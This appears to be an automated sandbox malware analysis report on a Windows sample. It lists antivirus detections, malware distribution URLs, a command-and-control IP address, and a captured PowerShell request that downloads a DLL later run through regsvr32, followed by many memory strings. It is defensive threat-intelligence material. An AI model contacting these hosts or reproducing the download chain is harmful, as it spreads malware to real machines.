Windows Analysis Report

AV Detection

Source: https://173.82.82.196:8080/temV	Avira URL Cloud: Label: malware
Source: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/	Avira URL Cloud: Label: malware
Source: https://173.82.82.196:8080/l	Avira URL Cloud: Label: malware
Source: http://digitalkitchen.jp/images/PVn/	Avira URL Cloud: Label: malware
Source: https://173.82.82.196/	URL Reputation: Label: malware
Source: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/	Avira URL Cloud: Label: malware
Source: https://173.82.82.196:8080/	URL Reputation: Label: malware
Source: http://piffl.com/piffl.com/a/	Avira URL Cloud: Label: malware
Source: https://nakharinitwebhosting.com/HSDYKN1X5GLF/	Avira URL Cloud: Label: malware
Source: https://173.82.82.196:8080/P	Avira URL Cloud: Label: malware

Source: jsonsintl.com	Virustotal: Detection: 5%			Perma Link
Source: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/	Virustotal: Detection: 14%			Perma Link

Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP	ReversingLabs: Detection: 40%
Source: C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy)	ReversingLabs: Detection: 40%

Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP

Joe Sandbox ML: detected

Spreading

Source: C:\Windows\System32\regsvr32.exe

Code function: 17_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,

17_2_00000001800248B0

Networking

Source: C:\Windows\System32\regsvr32.exe

Network Connect: 173.82.82.196 8080

Jump to behavior

Source: Joe Sandbox View	ASN Name: MULTA-ASN1US MULTA-ASN1US
Source: Joe Sandbox View	ASN Name: DIMENOCUS DIMENOCUS

Source: Joe Sandbox View

IP Address: 173.82.82.196 173.82.82.196

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 02:12:15 GMTServer: ApacheX-Powered-By: PHP/5.6.40Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 02:12:15 GMTContent-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"Content-Transfer-Encoding: binarySet-Cookie: 628aed7f4404a=1653271935; expires=Mon, 23-May-2022 02:13:15 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 02:12:15 GMTContent-Length: 365056Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=40Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhk

Source: global traffic

HTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.3:49752 -> 173.82.82.196:8080

Source: unknown	TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown	TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown	TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown	TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown	TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown	TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown	TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown	TCP traffic detected without corresponding DNS query: 173.82.82.196
Source: unknown	TCP traffic detected without corresponding DNS query: 173.82.82.196

Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","P equals www.facebook.com (Facebook)
Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","P equals www.twitter.com (Twitter)
Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 00000016.00000003.386375309.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab

Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cmentarz.5v.pl/themes/zalMkTb/
Source: regsvr32.exe, 00000011.00000003.390757486.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504419422.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.506488059.0000025912489000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436767944.0000019AC6500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.505950785.0000021041500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000013.00000002.506283732.000002591240E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.436767944.0000019AC6500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: regsvr32.exe, 00000011.00000003.391691578.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504289621.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000011.00000003.390757486.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000003.382340670.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.505425880.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504419422.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000003.382007388.0000000002C91000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000003.382164868.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.17.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://digitalkitchen.jp/images/PVn/
Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: powershell.exe, 00000002.00000002.320823240.00000000051EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsonsintl.com
Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/
Source: powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://piffl.com/piffl.com/a/
Source: powershell.exe, 00000002.00000002.320009117.0000000004E31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 0000000A.00000002.319116790.000001C280013000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: powershell.exe, 00000002.00000002.320823240.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.320777939.00000000051DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jsonsintl.com
Source: powershell.exe, 00000002.00000002.320849477.00000000051F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jsonsintl.com/
Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/
Source: powershell.exe, 00000002.00000002.320777939.00000000051DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jsonsintl.com4
Source: svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://173.82.82.196/
Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://173.82.82.196:8080/
Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://173.82.82.196:8080/P
Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://173.82.82.196:8080/l
Source: regsvr32.exe, 00000011.00000003.391637256.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000011.00000002.504047739.0000000000B43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://173.82.82.196:8080/temV
Source: svchost.exe, 00000008.00000002.504457787.000001EB54244000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000008.00000002.504401163.000001EB54229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000008.00000002.504401163.000001EB54229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000A.00000002.319452146.000001C28006A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.317899105.000001C280068000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000002.319333412.000001C28004B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319306799.000001C280042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318517655.000001C280041000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319306799.000001C280042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318517655.000001C280041000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000002.319371007.000001C28005C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000A.00000003.318070878.000001C280061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: powershell.exe, 00000002.00000002.320233459.0000000004F75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000003.299865395.00000000058F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.321132873.0000000005289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nakharinitwebhosting.com/HSDYKN1X5GLF/
Source: powershell.exe, 00000002.00000002.323273907.0000000005E95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.hotspotshield.com/
